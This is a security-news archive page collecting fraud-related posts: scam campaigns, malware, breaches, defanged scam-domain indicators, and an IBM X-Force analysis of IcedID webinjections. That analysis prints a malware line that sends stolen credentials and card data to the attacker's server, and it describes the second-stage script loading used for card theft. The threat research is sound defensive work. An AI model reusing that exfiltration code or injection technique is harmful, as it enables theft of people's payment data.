Category Archives: fraud

Major Android ad fraud scam campaign drains battery & eats data

By Waqas

Presence of infected games and apps that are costing innocent users financial and data losses is not a new phenomenon. However, it is indeed surprising that a firm that promises to fight app piracy is itself involved in this horrendous act.   According to the latest research from Oracle, there is a new ad fraud […]

This is a post from HackRead.com Read the original post: Major Android ad fraud scam campaign drains battery & eats data

Rietspoof malware distributes ransomware via messaging apps

By Waqas

A malware strain dubbed as Rietspoof has been under the radar of researchers at Avast since last August. Reportedly, researchers suspect that the malware is on the rise and it is being distributed via Skype, Facebook Messenger, and other messaging apps. Researchers maintain that the malware actually is a dropper designed to allow dangerous ransomware to […]

This is a post from HackRead.com Read the original post: Rietspoof malware distributes ransomware via messaging apps

I Am Not Associated with Swift Recovery Ltd.

It seems that someone from a company called Swift Recovery Ltd. is impersonating me -- at least on Telegram. The person is using a photo of me, and is using details of my life available on Wikipedia to convince people that they are me.

They are not.

If anyone has any more information -- stories, screen shots of chats, etc. -- please forward them to me.

Hacked versions of popular iOS games available on App Store

By Waqas

Software pirates are distributing hacked and infected versions of iPhone apps by hijacking Apple’s enterprise developer program. Reportedly, the hacked apps include versions of Minecraft, Spotify, Angry Birds, and Pokemon Go. These apps have been modified for making paid content/features available for free to deprive the original developers and Apple of their due revenue share […]

This is a post from HackRead.com Read the original post: Hacked versions of popular iOS games available on App Store

Catastrophe, Not Compromise: VFEmail Attack Destroys Decades of Data

The email provider VFEmail suffered a “catastrophic” hack that destroyed the company’s primary and backup data servers in the U.S.

As reported by Krebs on Security, the attack began on the morning of Feb. 11, when the company’s official Twitter account warned that all external-facing systems across multiple data centers were down. Hours later, VFEmail tweeted that it “caught the perp in the middle of formatting the backup server.” Just after 1 p.m., the company reported that all disks on every server had been formatted with every VM, file server and backup server lost.

Only a small, Netherlands-based backup server was left untouched. VFEmail founder Rick Romero (@Havokmon) tweeted on Feb. 12 that the company is “effectively gone” and will likely not return.

VFEmail’s Exceptional Circumstances

Most email attacks aren’t looking to destroy data. As reported by Healthcare IT News, healthcare email fraud attacks are up by nearly 500 percent over the last two years, while IT Pro Portal noted that threat actors are now leveraging compromised accounts to gain email access and steal confidential data. Even ransomware attacks — which include the threat of data destruction — are typically used as leverage to generate corporate payouts.

The VFEmail hack, meanwhile, had no clear aim: No ransom message was reported, and there’s no evidence that data was exfiltrated before being destroyed. Romero managed to track the attacker to an IP address hosted in Bulgaria — likely just a virtual machine (VM) that was used as a launch pad for the attack.

He also noted that to compromise VFEmail’s mail hosts, VM hosts and SQL server clusters, the attacker would have needed multiple passwords, as reported by Ars Technica. While some of the mail service is back up and running, there’s only a slim chance that U.S. email data will be recovered.

Back Up Your Mission-Critical Email Data

Email clients come with inherent risks and no guarantees. While layered email security can help reduce the risk of malware infections and ransomware attacks, it can’t prevent host-side attacks like the one VFEmail experienced.

Security teams should follow best practices for defending against threats that destroy data, such as ransomware attacks. According to experts, data backups are key to reducing the risk of complete data loss — while this typically applies to local files, enterprises using hosted email providers to send and receive mission-critical data should consider creating an on- or off-site email backup to combat the threat of catastrophic data destruction.

The post Catastrophe, Not Compromise: VFEmail Attack Destroys Decades of Data appeared first on Security Intelligence.

NBlog Feb 14 – online lovers, offline scammers





Social engineering scams are all the rage, a point worth noting today of all days.

A Kiwi farmer literally lost the farm to a scammer he met and fell for online. 

Reading the news report, this was evidently a classic advance fee fraud or 419 scam that cost him a stunning $1.25m. 

This is not the first time I've heard about victims being drawn-in by the scammers to the extent that they refuse to accept that they have been duped when it is pointed out to them. There's probably something in the biology of our brains that leads us astray - some sort of emotional hijack going on, bypassing the normal rational thought processes.

On a more positive note, the risks associated with online dating are reasonably well known and relatively straightforward to counter. And old-school offline dating is not risk free either. 

Relationships generally are a minefield ... but tread carefully and amazing things can happen. Be careful, be lucky.

Historical OSINT – Profiling a Portfolio of Fake Visa Application Scam Domains

It's been a while since I last posted a quality update profiling a versatile currently circulating malicious and fraudulent spam campaign profiling and highlighting the fraudulent and malicious activities of the cybercriminals behind the campaign. In this post I'll profile a currently circulating Fake Visa Application fraudulent campaign enticing users into submitting their personal details for

Historical OSINT – Profiling a Rogue and Malicious Domain Portfolio of OEM-Pirated Software

In a cybercrime-ecosystem dominated by fraudulent and malicious releases cybercriminals continue relying on fraudulent and potentially-malicious affiliate-based type of revenue-sharing schemes for the purpose of serving fraudulent and malicious software to thousands of unsuspecting users including OEM-powered pirated software to millions of users globally. In this post I'll profile a currently 

Historical OSINT – Profiling a Typosquatted Facebook and Twitter Impersonating Fraudulent and Malicious Domains Portfolio

With cybercriminals continuing to populate the cybercrime ecosystem with hundreds of malicious released including a variety of typosquatted domains it shouldn't be surprising that hundreds of thousands of users continue falling victim to fraudulent and malicious malware and exploits serving schemes. In this post I'll profile a currently active fraudulent and malicious typosquatted domain

Historical OSINT – Able Express Courier Service Re-Shipping Mule Recruitment Scam Spotted in the Wild

I've recently intercepted a currently circulating malicious and fraudulent spam campaign successfully impersonating "Able Express Courier Service" to utilize a re-shipping mule recruitment scam potentially targeting tens of thousands of unsuspecting users globally. Sample malicious URL known to have participated in the campaign: hxxp://ablecs.biz - 104.31.82.184 - Email: phyllisjhurst@grr.la

Historical OSINT – Global Postal Express Re-Shipping Mule Recruitment Scam Spotted in the Wild

Continuing the series of post detailing the activities of currently circulating malicious and fraudulent spam campaigns successfully targeting potential money mule recruiters I've recently came across to Global Postal Express which basically: "We Provide best in service global logistics through our people by building lasting relationships with the commitment to prioritize our customer needs to

Historical OSINT – Re-Shipping Money Mule Recruitment “Your Shipping Panel LLC” Scam Domain Portfolio Spotted in the Wild

The time has come to profile a recently intercepted and currently active malicious and fraudulent re-shipping money mule recruitment fraudulent campaign successfully enticing users into interacting with the rogue and bogus content potentially risk-forwarding the risk of the fraudulent transaction to the unsuspecting user. Sample malicious URL: hxxp://yourshippingpanel.com Sample Mailing

Using Gmail "Dot Addresses" to Commit Fraud

In Gmail addresses, the dots don't matter. The account "bruceschneier@gmail.com" maps to the exact same address as "bruce.schneier@gmail.com" and "b.r.u.c.e.schneier@gmail.com" -- and so on. (Note: I own none of those addresses, if they are actually valid.)

This fact can be used to commit fraud:

Recently, we observed a group of BEC actors make extensive use of Gmail dot accounts to commit a large and diverse amount of fraud. Since early 2018, this group has used this fairly simple tactic to facilitate the following fraudulent activities:

  • Submit 48 credit card applications at four US-based financial institutions, resulting in the approval of at least $65,000 in fraudulent credit
  • Register for 14 trial accounts with a commercial sales leads service to collect targeting data for BEC attacks
  • File 13 fraudulent tax returns with an online tax filing service
  • Submit 12 change of address requests with the US Postal Service
  • Submit 11 fraudulent Social Security benefit applications
  • Apply for unemployment benefits under nine identities in a large US state
  • Submit applications for FEMA disaster assistance under three identities

In each case, the scammers created multiple accounts on each website within a short period of time, modifying the placement of periods in the email address for each account. Each of these accounts is associated with a different stolen identity, but all email from these services are received by the same Gmail account. Thus, the group is able to centralize and organize their fraudulent activity around a small set of email accounts, thereby increasing productivity and making it easier to continue their fraudulent behavior.

This isn't a new trick. It has been previously documented as a way to trick Netflix users.

News article.

Slashdot thread.

IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites

As part of the ongoing research into cybercrime tools targeting users of financial services and e-commerce, IBM X-Force analyzes the tactics, techniques and procedures (TTPs) of organized malware gangs, exposing their inner workings to help diffuse reliable threat intelligence to the security community.

In recent analysis of IcedID Trojan attacks, our team looked into how IcedID operators target e-commerce vendors in the U.S., the gang’s typical attack turf. The threat tactic is a two-step injection attack designed to steal access credentials and payment card data from victims. Given that the attack is separately operated, it’s plausible that those behind IcedID are either working on different monetization schemes or renting botnet sections to other criminals, turning it to a cybercrime-as-a-service operation, similar to the Gozi Trojan’s business model.

IcedID Origins

IBM Security discovered and named IcedID in September 2017. This modern banking Trojan features similar modules to malware like TrickBot and Gozi. It typically targets banks, payment card providers, mobile services providers, payroll, webmail and e-commerce sites, and its attack turf is mainly the U.S. and Canada. In their configuration files, it is evident that IcedID’s operators target business accounts in search of heftier bounties than those typically found in consumer accounts.

IcedID has the ability to launch different attack types, including webinjection, redirection and proxy redirection of all victim traffic through a port it listens on.

The malware’s distribution and infection tactics suggest that its operators are not new to the cybercrime arena; it has infected users via the Emotet Trojan since 2017 and in test campaigns launched in mid-2018, also via TrickBot. Emotet has been among the most notable malicious services catering to elite cybercrime groups from Eastern Europe over the past two years. Among its dubious customers are groups that operate QakBot, Dridex, IcedID and TrickBot.

Using ATSEngine to Orchestrate Attacks on E-Commerce Users

While current IcedID configurations feature both webinjection and malware-facilitate redirection attacks, let’s focus on its two-stage webinjection scheme. This tactic differs from similar Trojans, most of which deploy the entire injection either from the configuration or on the fly.

To deploy injections and collect stolen data coming from victim input, some IcedID operators use a commercial inject panel known as Yummba’s ATSEngine. ATS stands for automatic transaction system in this case. A web-based control panel, ATSEngine works from an attack/injection server, not from the malware’s command-and-control (C&C) server. It allows the attacker to orchestrate the injection process, update injections on the attack server with agility and speed, parse stolen data, and manage the operation of fraudulent transactions. Commercial transaction panels are very common and have been in widespread use since they became popular in the days of the Zeus Trojan circa 2007.

Targeting Specific E-Commerce Vendors

In the attack we examined, we realized that some IcedID operators are using the malware to target very specific brands in the e-commerce sphere. Our researchers noted that this attack is likely sectioned off from the main botnet and operated by criminals who specialize in fraudulent merchandise purchases and not necessarily bank fraud.

Let’s look at a sample code from those injections. This particular example was taken from an attack designed to steal credentials and take over the accounts of users browsing to a popular e-commerce site in the U.S.

As a first step, to receive any information from the attack server, the resident malware on the infected device must authenticate itself to the botnet’s operator. It does so using a script from the configuration file. If the bot is authenticated to the server, a malicious script is sent from the attacker’s ATSEngine server, in this case via the URL home_link/gate.php.

Notice that IcedID protects its configured instructions with encryption. The bot therefore requires a private key that authenticates versus the attacker’s web-based control panel (e.g., var pkey = “Ab1cd23”). This means the infected device would not interact with other C&C servers that may belong to other criminals or security researchers.

IBM X-Force Research

Figure 1: IcedID Trojan receives instructions on connecting to attack server (source: IBM Trusteer)

Next, we evaluated the eval(function(p, a, c, k, e, r) function in the communication with the attack server and got the following code to reveal. Encoding is a common strategy to pack code and make it more compact.

IBM X-Force Research

Figure 2: IcedID code designed to set the browser to accept external script injections (source: IBM Trusteer)

This function sets the infected user’s browser to accept external script injections that the Trojan will fetch from its operator’s server during an active attack.

The following snippet shows the creation of a document object model (DOM) script element with type Text/javascript and the ID jsess_script_loader. The injection’s developer used this technique to inject a remote script into a legitimate webpage. It fetches the remote script from the attacker’s C&C and then embeds it in a script tag, either in the head of the original webpage or in its body.

Taking a closer look at the function used here, we can see that it loads the script from the home_link of the ssid= of the infected user’s device, along with the current calendar date.

IBM X-Force Research

Figure 3: IcedID code designed to inject remote script into targeted website (source: IBM Trusteer)

Steps 1 and 2: JavaScript and HTML

To perform the webinjection, an external script, a malicious JavaScript snippet, is charged with injecting HTML code into the infected user’s browser. Using this tactic, the malware does not deploy the entire injection from the configuration file, which would essentially expose it to researchers who successfully decrypt the configuration. Rather, it uses an initial injection as a trigger to fetch a second part of the injection from its attack server in real time. That way, the attack can remain more covert and the attacker can have more agility in updating injections without having to update the configuration file on all the infected devices.

In the example below, the HTML code, named ccgrab, modifies the page the victim is viewing and presents social engineering content to steal payment card data. This extra content on the page prompts the victim to provide additional information about his or her identity to log in securely.

IBM X-Force Research

Figure 4: IcedID tricking victim with webinjection (source: IBM Trusteer)

The malware automatically grabs the victim’s access credentials and the webinjection requests the following additional data elements pertaining to the victim’s payment card:

  • Credit card number;
  • CVV2; and
  • The victim’s state of residence.

Once the victim enters these details, the data is sent to the attacker’s ATSEngine server in parsed form that allows the criminal to view and search data via the control panel.

IBM X-Force Research

Figure 5: Parsed stolen data sent to attacker’s injection server (source: IBM Trusteer)

Managing Data Theft and Storage

The malicious script run by the malware performs additional functions to grab content from the victim’s device and his or her activity. The content grabbing function also checks the validity of the user’s input to ensure that the C&C does not accumulate junk data over time and manages the attack’s variables.

IBM X-Force Research

Figure 6: Malicious IcedID script manages data grabbing (source: IBM Trusteer)

Once the data from the user is validated, it is saved to the C&C:

IBM X-Force Research

Figure 7: Saving stolen data to attack server logs (source: IBM Trusteer)

Injection Attack Server Functions

The attack server enables the attacker to command infected bots by a number of functions. Let’s look at the function list that we examined once we decoded IcedID’s malicious script:

Function name

Purpose

isFrame()

Checks for frames on the website to look for potential third-party security controls.

isValidCardNumber(a)

Validates that payment card numbers are correct. This function is likely based on the Luhn algorithm.

onLoaded()

The main function that sets off the data grabbing process.

addLog(a,b,c,d)

Adds new logs to the reports section in the attack server.

writeLog()

Writes logs to the attack server after validation of the private key and the victim’s service set identifier (SSID). This is achieved by the following script: getData(gate_link + a + “&pkey=” + urlEncode(pkey) + “&ssid=” + b, b)

The attack server enables the operator to use different functions that are sectioned into tabs on the control panel:

  • Accounts page functions — shows the account pages the victim is visiting with the infected user’s credentials.
  • Content variables — includes report generation, account page controls, pushing HTML content into pages the victim is viewing, and a comments module to keep track of activity.
  • Private functions to get HEX and decode.
  • Main page functions.
  • Comments global.
  • Reports global.

Figure 8 below shows the layout of information about functions used on a given infected device as it appears to the attacker using the ATSEngine control panel:

IBM X-Force Research

Figure 8: Attacker’s view from the control panel that manages stolen data (source: IBM Trusteer)

Data Management and Views

The ATSEngine control panel enables the attacker to view the active functions with a time stamp (see Figure 8). The following information is retrieved from the victim’s device and sent to the attack server:

  • Last report time from this infected device;
  • Victim’s IP Address;
  • Victim’s attributed BotID;
  • Victim’s login credentials to the website he or she is visiting;
  • Additional grabbed data from webinjection to the target page, including the victim’s name, payment card type, card number and CVV2, and state of residence; and
  • Comments section inserted by the attacker about the particular victim and his or her accounts.

A view from the control panel displays essential data in tables, providing the attacker with the victim’s login credentials to the targeted site:

IBM X-Force Research

Figure 9: Stolen account information parsed on control panel view (source: IBM Trusteer)

Sectioned IcedID Botnet

Following the analysis of IcedID’s injections and control panel features, our researchers believe that, much like other Trojan-operating gangs, IcedID is possibly renting out its infrastructure to other criminals who specialize in various fraud scenarios.

The control panel, a common element in online fraud operations, reveals the use of a transaction automation tool (ATS) by IcedID’s operators. This commercial panel helps facilitate bot control, data management and management of fraudulent activity. The panel of choice here is a longtime staple in the cybercrime arena called the Yummba/ATSEngine.

Fraud scenarios may vary from one operator to another, but IcedID’s TTPs remain the same and are applied to all the attacks the Trojan facilitates. As such, IcedID’s webinjections can apply to any website, and its redirection schemes can be fitted to any target.

Sharpened Focus in 2019

While some Trojan gangs choose to expand their attack turf into more countries, this requires funding, resources to build adapted attack tools, alliances with local organized crime and additional money laundering operations. In IcedID’s case, it does not appear the gang is looking to expand. Ever since it first appeared in the wild, IcedID has kept its focus on North America by targeting banks and e-commerce businesses in that region.

In 2018, IcedID reached the fourth rank on the global financial Trojan chart, having kept up its malicious activity throughout the year.

IBM X-Force Research

Figure 10: Top 10 financial Trojan gangs in 2018 (source: IBM Trusteer)

In 2019, our team expects to see this trend continue. To keep up on threats like IcedID, read more threat research from the X-Force team and join X-Force Exchange, where we publish indicators of compromise (IoCs) and other valuable intelligence for security professionals.

The post IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites appeared first on Security Intelligence.

Manage Emerging Cybersecurity Risks by Rallying Around Mutual Concerns

Global risks are intensifying but the collective will to tackle them appears to be lacking. — The World Economic Forum’s “Global Risks Report 2019”

With the start of a new calendar year, chief information security officers (CISOs) are looking for ways to set the tone for the year and have more engaged conversations with top leadership regarding cybersecurity risks. The good news is January provided such an opportunity, but it’s not what you might expect.

Every year, the world’s elite descends on Davos, Switzerland, as part of the global gathering known as the World Economic Forum (WEF). A few weeks before they hold this event, the WEF releases its “Global Risks Report,” and this year, once again, cyber risks figured prominently. The report was based on survey responses from nearly 1,000 decision-makers from the business and government sectors, academia, nongovernmental organizations (NGOs), and other international organizations.

Cybersecurity Risks Once Again in the Top 5

The report opens with its distinctive global risks landscape diagram, and cyber-related risks fall in the top-right quadrant of global risks, both in terms of likelihood and impact. When it comes to likelihood, data fraud or theft came in fourth place after three environmental risks, with cyberattacks rounding out the top five.

When ranked by impact, cyberattacks still made it into the top 10, in seventh place, followed immediately by critical information infrastructure breakdown. The fact that data fraud or theft wasn’t in the top 10 risks by impact might indicate that markets and business leaders are more confident about the global economy’s ability to detect and respond to such an event.

This is by no means the first time that technology-related risks made it to the top of the list: Cyberattacks have appeared four times in the top five risks by likelihood since 2010 (in 2012, 2014, 2018 and 2019). However, in terms of impact, the only technology-related risk to make the top five was critical information infrastructure breakdown in 2014.

Is it symptomatic of a larger disconnect that, in the last decade, global leaders only once perceived a technology-related risk as a top-five risk in terms of impact? Do top leadership and board directors at your organization share this attitude?

A Conversation Starter for CISOs and Top Leadership

Of course, the WEF report is aimed at a global audience of business and government executives, so it might not be immediately apparent how CISOs could benefit from grabbing a copy and leafing through it. However, because technology-based risks — and more specifically, cyber-related risks — feature so prominently in the report, there is a unique opportunity to engage or re-engage top leadership and boards to discuss these issues and re-evaluate the organization’s current risk appetite. Among the topics covered in the report are many areas that CISOs should be ready to engage on, including:

  • Machine learning and artificial intelligence (AI) — How, if at all, is your organization leveraging these technologies? Is the security function engaged at the earliest part of the process to implement them?
  • Regulatory changes, such as the General Data Protection Regulation (GDPR) — Is your organization now fully compliant with the GDPR? Are there other GDPR-like regulations on the horizon that need to be on your radar?
  • Interconnectedness of cybersecurity risks — Is your organization on its way to becoming cyber resilient? How often is your organization’s resilience put to the test?
  • Quantum computing and cryptography — Who, if anyone, is keeping track of developments in quantum computing? How often is this disruptive technology being discussed, both in terms of the opportunities it presents, but also the risks to traditional cryptographic methods of protecting company secrets?

Interconnectedness Versus Resilience

If there’s one section of the report that CISOs should share with top leadership, it is the portion titled “Managing in the Age of Meltdowns” (just three pages long). As the interconnectedness of technology increases the potential for cascading failures, this section reminds us of the stakes: “When something goes wrong in a complex system, problems start popping up everywhere, and it is hard to figure out what’s happening. And tight coupling means that the emerging problems quickly spiral out of control and even small errors can cascade into massive meltdowns.”

The section covers different strategies to help deal with complex, dynamic systems and provides guidance for CISOs to review and improve the effectiveness of existing processes. Strategies include encouraging healthy skepticism and recognizing the value of clear and honest lines of reporting. CISOs should also try to “imagine failure” or, better yet, simulate a breach to practice their response. The report also reminds security leaders to perform thorough root-cause analysis, as “too often, we base decisions on predictions that are overly simplistic, missing important possible outcomes.”

Find a Rallying Point

Most CISOs know they’re more likely to be heard when aligning their messages and efforts with the concerns of top leadership. In a world of increasing global risks, security leaders must engage with all levels of the organization to truly understand what cybersecurity risks are top of mind, from the board and C-suite all the way down to entry-level analysts. Organizing around mutual concerns will help maximize security at the enterprise.

The post Manage Emerging Cybersecurity Risks by Rallying Around Mutual Concerns appeared first on Security Intelligence.

Employees report 23,000 phishing incidents annually, costing $4.3 million to investigate

Account takeover-based (ATO) attacks now comprise 20 percent of advanced email attacks, according to Agari’s Q1 2019 Email Fraud & Identity Deception Trends report. ATO attacks are dangerous because they are more difficult to detect than traditional attacks – compromised accounts seem legitimate to email filters and end users alike because they are sent from a real sender’s email account. “Credential phishing was already a huge risk for organizations because of the potential for data … More

The post Employees report 23,000 phishing incidents annually, costing $4.3 million to investigate appeared first on Help Net Security.

eCommerce credit card fraud is nearly an inevitability

Riskified surveyed 5,000 US-based consumers aged 18 and older about their online shopping behaviors, experience with and prevalence of credit card fraud, repeat shopping likelihood and customer satisfaction to develop a full picture of how consumers react to a number of common shopping experiences. The results are worrisome for both consumers and merchants, as roughly half of respondents reported experience with credit card fraud and 30% had their purchase wrongly declined, with a corresponding negative … More

The post eCommerce credit card fraud is nearly an inevitability appeared first on Help Net Security.

Authorities shut down xDedic marketplace for selling hacked servers

By ghostadmin

The domain for xDedic has been seized as well. In a joint operation, the Federal Bureau of Investigation (FBI) and authorities from several European countries have successfully taken down xDedic, a notorious dark web marketplace known for selling stolen digital goods such as login credentials, identity cards, and hacked servers. The operation was carried out on January 24th […]

This is a post from HackRead.com Read the original post: Authorities shut down xDedic marketplace for selling hacked servers

The Success of Your Business Depends on Digital Trust. Here Is How to Measure It

Most people can name a recent example of online data being compromised, and consumers have become more concerned about how organizations protect their data. Whether the data in question is a physical location, credit card numbers or buying preferences, modern, tech-savvy consumers are thinking long and hard about digital trust risks and the privacy of their data.

“It’s not now just about price, feature, and benefits, it’s not even about history and legacy, it is about trust,” said researcher Mark McCrindle on behalf of Blackmores, an Australian vitamin company, according to CMO. “Every brand must build and maintain trust, particularly because the customer is more skeptical and empowered.”

In This Article

The Consumer Confidence Crisis

Consumer confidence in brands has dropped to a historic low. According to the “2018 Edelman Trust Barometer,” 7 in 10 industries are solidly in “distrust territory.” Customers are increasingly aware that their decision to share personal data with brands could have significant implications, and new legislation backs the customer’s right to opt out of untrustworthy brand engagements.

As organizations work to build customer-focused, digital business models, it’s critical to consider the role of trust and privacy in the customer journey. Delivering digital trust isn’t a matter of propping up a secure website or app, or avoiding a costly, embarrassing data breach. It’s about creating a digital experience that exceeds customer expectations, allows frictionless access to goods and services, and protects customers’ right to privacy while using the data they share to create customized, valuable experiences.

Learn how to deliver digital trust

Why Failure to Build Trust Is Risky

There are clear risks facing organizations that fail to deliver trust-inspiring digital experiences. The staggering reputational costs to brands that suffer a data breach underline how easily trust is broken and how difficult it can be to restore. However, even without security incidents, there could be significant consequences for brands that don’t transform the customer experience.

Customers who experience friction as part of the digital experience may choose to go elsewhere, impacting profitability. Brands that lack transparent data privacy practices could struggle to build strong customer relationships if the consumer feels that the interaction is “sketchy” or too invasive. There’s also risk for the organization: If it can’t tell the difference between legitimate customer transactions and costly fraud, it may throw up frustrating security barriers or risk loss due to account compromise or other fraudulent activities.

How to Measure Digital Trust With Business Outcomes

“Digital trust is not a method, product or service,” wrote IBM security orchestration, automation and response leader Matthew Konwiser. “It’s a philosophy that acknowledges why … businesses stay in business; their clients trust them.”

Digital trust can be measured in business outcomes. While these aspects are more complex than security metrics or compliance, they are critical. Digital trust results from a shift in how the organization approaches the customer journey, which can be measured in the following business outcomes.

Outcome No. 1: Build User Trust

Organizations should transform digital customer experiences to create a secure and seamless customer journey across digital products. This reinforces customer trust while providing internal visibility into customer behavior. Increased trust should result in greater customer loyalty and greater share of wallet.

Outcome No. 2: Drive Growth

Organizations that focus on digital trust continuously work to improve user experience and strengthen internal security safeguards. By utilizing security solutions that assess risk and only add verification when needed, there are fewer false positives and security teams can focus where needed. Automation and authentication based on risk scoring can streamline customer access and reduce workload for already over-tasked IT/security staff.

Outcome No. 3: Create Efficiency

Brands should continuously work to offer an improved user experience and strengthen internal security safeguards. Leaders at trust-driven organizations prioritize operational efficiency gains and risk reduction.

Why You Should Shift to a Trust-Focused Model

While digital trust isn’t the exclusive goal or responsibility of the security department, the CISO is a diplomat in the transformation process. At a trust-focused organization, security risk is recognized as business risk. Business leaders should actively support the need for persistent visibility into digital customer behavior, even as the cybersecurity team works to strengthen safeguards against threat actors and data privacy risks.

Trust should feel seamless for trusted customers with barriers only appearing to threat actors. Cognitive solutions and analytics can provide visibility into a customer’s movements across digital platforms and identify risks by comparing real-time data to a baseline of known threats. When an abnormal pattern of customer logins, transactions or behavior is identified, the system should automate an immediate response to further authenticate users or isolate risks.

The process of delivering digital trust is about more than security and technology, however. It’s a shift in leadership that places the customer experience at the center of digital transformation. Trust-focused organizations adopt design thinking processes to create digital products based on the customer journey and architect secure DevOps. Baked-in security offers greater assurance against risks and creates a more seamless digital experience across channels.

Empathy Is at the Core of Trust Delivery

Digital trust is a moving target, like any other strategic business goal. Your organization can’t rely on stagnant strategies to grow profitability or address risks. To build lasting customer relationships, organizations must understand that trust is a dynamic pursuit that requires agility.

Empathy toward the customer is at the core of trust delivery. As customer attitudes about privacy and behaviors shift, enterprise practices and technology must keep up with evolving data privacy threats, compliance requirements and client behaviors. The importance of trust is unlikely to diminish, but delivering trust-inspiring customer experiences requires a culture of design thinking, continuous improvement and security by default.

Read the e-book: Deliver Digital Trust

The post The Success of Your Business Depends on Digital Trust. Here Is How to Measure It appeared first on Security Intelligence.

Two Ukrainians Charged with Plot to Hack into SEC and Commit Fraud

The U.S. Department of Justice (DOJ) has charged two Ukrainians with participating in a plot to hack into computers systems at the U.S. Securities and Exchange Commission (SEC) and use the information they stole to commit fraud. On 15 January, the U.S. Attorney’s Office for the District of New Jersey announced a 16-count indictment charging […]… Read More

The post Two Ukrainians Charged with Plot to Hack into SEC and Commit Fraud appeared first on The State of Security.

Fraudsters increasingly turning to Fuze cards to evade police

Street thieves who specialize in cashing out stolen credit and debit cards are increasingly using Fuze cards to conduct fraud and theft, the U.S. Secret Service has warned in a memo to companies in the financial sector.

Fraud rings use Fuze cards to avoid suspicions that could arise by carrying dozens of cards when attempting to draw cash or conduct purchases. Fuze cards allow them to store information for up to 30 stolen cards. The thief can simply use the controls on the Fuze card to swap through the card numbers.

Brian Krebs, a cybersecurity expert and investigative reporter, received a copy of the memo, which said that, “The transaction may also appear as a declined transaction but the fraudster, with the push of a button, is changing the card numbers being used,” the memo notes.

“Fraud rings often will purchase data on thousands of credit and debit cards stolen from hacked point-of-sale devices or obtained via physical card skimmers,” Krebs explains. “The data can be encoded onto any card with a magnetic stripe, and then used to buy high-priced items at retail outlets — or to withdrawn [sic] funds from ATMs (if the fraudsters also have the cardholder’s PIN).”

The Secret Service memo underscores that, “while this smart card technology makes up a small portion of fraudulent credit cards currently, investigators should be aware of the potential for significant increases in fraud loss amounts with the emergence of this smart card technology.”

Fuze Card, the company behind the technology, plans to extend Fuze functionality to include transactions with virtual currencies, like Bitcoin. When that happens, fraudsters might further increase their reliance on Fuze to conduct illicit transactions.

Last year, two independent security researchers discovered a grave flaw in the Fuze Bluetooth-pairing functionality which allowed anyone with brief physical access to tamper with the data stored “securely” on the cards. The researchers disclosed the flaw to Fuze Cards responsibly, holding off a public announcement until the company patched the bugs – which it did, in a timely fashion.

Security newsround: January 2019

We round up interesting research and reporting about security and privacy from around the web. This month: the security year in review, resilience on rails, incidents in depth, phishing hooks millennials, Internet of Threats, and CISOs climbing the corporate ladder.

A look back at cybercrime in 2018

It wouldn’t be a new year’s email without a retrospective on major security incidents over the previous 12 months. Credit to CSO Online for assembling a useful overview of some of last year’s most common risks and threats. To beef up this resource, it sourced external research and stats, while adding plenty of links for further reading. Some of the highlights include the massive rise in cryptocurrency mining. “Coin miners not only slow down devices but can overheat batteries and sometimes render a device useless,” it warned.

The article also advises against posting mobile numbers on the internet, because criminals are finding ways to harvest them for various scams. CSO also advises organisations about knowing the value of their data in order to protect it accordingly. Threatpost has a handy at-a-glance guide to some of the big security incidents from the past year. Meanwhile, kudos to Vice Motherboard for its excellent ‘jealousy list’ which rounds up great hacking and security stories from 2018 that first appeared in other media outlets.

Luas security derails tram website

The new year got off to a bad start for Dublin’s tram operator Luas, after an unknown attacker defaced its website in a security incident. On January 2nd, the Luas site had this message: “You are hacked… some time ago i wrote that you have serious security holes… you didn’t reply… the next time someone talks to you, press the reply button… you must pay 1 bitcoin in 5 days… otherwise I will publish all data and send emails to your users.”

The incident exposed 3,226 user records, and Luas said they belonged to customers who had subscribed to its newsletter. News of the incident spread widely, possibly due to Luas’ high profile as a victim, or because of the cryptocurrency angle.

The tram service itself was not affected, nor was the company’s online payments system. While the website was down, Luas used its Twitter feed to communicate travel updates to the public, and warned people not to visit the site. Interviewed by the Irish Times, Brian Honan said the incident showed that many organisations tend to forget website security after launch. As we’ve previously blogged, it’s worth carrying out periodic vulnerability assessments to spot gaps that an attacker could exploit. With the Luas site not fully back six days later, Brian noted on Twitter that it’s important to integrate incident response with business continuity management.

One hacked laptop and two hundred solemn faces

When an employee of a global apparel company clicked on a link in a phishing email while connected to a coffee shop wifi, they unwittingly let a cybercrime gang onto their corporate network. Once in, the attackers installed Framework POS malware on the company’s retail server to steal credit card details. It’s one real-life example from CrowdStrike’s Cyber Intrusion Casebook. The report details various incident response cases from 2018. It also gives recommendations for organisations on steps to take to protect their critical data better. In addition to coverage in online news reports, the document is available as a free PDF on CrowdStrike’s site.

Examples like these show the need for resilience, which we’ve blogged about before. No security is 100 per cent perfect. But it shouldn’t follow that one gap in the defences brings the entire wall crumbling down.

Digitally savvy, yes. Security savvy, not so much

Speaking of phishing, a new survey has found that digital natives are twice as likely to have fallen victim to a phishing scam than their older – sorry, we mean more experienced –  colleagues. Some 17 per cent in the 23-41 age group clicked on a phishing link, compared to 42-53 years old (6 per cent) or 54+ (7 per cent). The findings suggest a gap between perception and reality.

Out of all the age groups, digital natives were the most confident in their ability to spot a scam compared to their senior peers. Yet the 14 per cent of digital natives who weren’t as sure of their ability to spot a phish was strikingly close to the percentage in the same age bracket who had fallen for a phishing email. The survey by Censuswide for Datapac found that 14 per cent of Irish office workers – around 185,000 people – have been successfully phished at some stage.

OWASP’s IoT hit list

Is your organisation planning an Internet of Things project in 2019? Then you might want to send them in OWASP’s direction first. The group’s IoT project aims to improve understanding of the security issues around embedding sensors in, well, anything. To that end, the group has updated its top 10 list for IoT. The risks include old reliables like weak, guessable passwords, outdated components, insecure data transfer or storage, and lack of physical hardening. The full list is here.

The number’s up for CISO promotions

Why do relatively few security professionals ascend to the highest levels of business? That’s the provocative question from Raj Samani, chief scientist with McAfee. In an op-ed for Infosecurity Magazine, Samani argues that security hasn’t yet communicated its value to the business in an identifiable way. Proof of this is the fatigue or indifference over ever-mounting numbers of data breaches. Unlike a physical incident like a car accident where the impact is instantly visible, security incidents don’t have the same obvious cause and effect.

“The inability to determine quantifiable loss means that identifying measures to reduce risk are merely estimated at best. Moreover, if the loss is rarely felt, then the value of taking active steps to protect an asset can simply be overlooked,” Samani writes. “We can either bemoan the status quo or identify an approach that allows us to articulate our business value in a quantifiable way.”

The post Security newsround: January 2019 appeared first on BH Consulting.

Thieves make off with shoppers’ credit card numbers after hacking apparel site for four months

